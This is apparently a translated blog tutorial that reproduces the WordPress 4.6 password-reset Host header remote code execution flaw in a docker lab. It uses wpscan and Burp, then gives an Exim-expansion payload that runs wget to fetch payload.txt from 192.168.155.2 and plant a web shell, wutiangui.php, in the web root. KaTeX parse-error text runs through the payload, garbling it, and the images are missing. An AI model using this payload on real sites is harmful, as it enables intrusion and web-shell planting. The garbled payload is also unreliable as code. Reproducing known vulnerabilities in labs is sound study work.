Article directory

1. Build environment
2. Recurrence of vulnerabilities

Foreign: WordPress, Drupal, Joomla, these are the three most popular CMS abroad. Domestically, they are DedeCMS, Empire, PHPCMS, etc.
Domestic CMS will pursue large and comprehensive, while foreign CMS pay more attention to ecology and friendly interfaces, leaving more functions to third-party development plug-ins.
Recommend a few relatively new ones: ProcessWire, OctoberCMS, CraftCMS

1. Build environment

Enter pwnscriptum in wordpress and run docker
docker-compose up -d to pull the environment
Insert image description here

Scan the wordpress version. Only versions 4.6 and below have this vulnerability
wpscan --url http://192.168.25.128:8080/
Insert image description here

2. Recurrence of vulnerabilities

1. Capture packets

Click Forgot Password and enter the username or email you just created
Insert image description here

Enable burp packet capture and interception
Insert image description here

2. Prepare payload

Host: aa(any -froot@localhost -be $KaTeX parse error: Expected '}', got 'EOF' at end of input: {run{$ {substr{0}{1}{ $KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}usr$ {substr{0}{1}{ $KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}bin$ {substr{0}{1}{ $KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}wget$ {substr{10}{1}{ $KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}--output-docum\dots$ {substr{10}{1}{ $KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}$ {substr{0}{1}{ $KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}var$ {substr{0}{1}{ $KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory} ̲}www$ {substr{0}{1}{ $KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}html$ {substr{0}{1}{ $KaTeX parse error: Expected 'EOF ', got '}' at position 16: spool_directory}̲}wutiangui.php$ {substr{10}{1}{ $KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}192.168.155.2 :\dots$ {substr{0}{1}{$spool_directory}}payload.txt}} null) This sentence means to download the file payload.txt from the IP address 192.168.155.2 to var/www/html on the target machine. In the wutiangui.php file in the directory

3.Send payload

Input a sentence Trojan into the target machine through BP and test whether it can be written successfully through BP.
Insert image description here

4. Check whether the upload is successful

Insert image description here

There is no error reported in the web page echo. It should be successful.
After execution, enter the following directory to view
/var/lib/docker/overlay2/b0766f51462cbcb76c2f483c439ab74adce69f6b1f5325b69f67ef889ee3b21e/merged/var/www/html
Insert image description here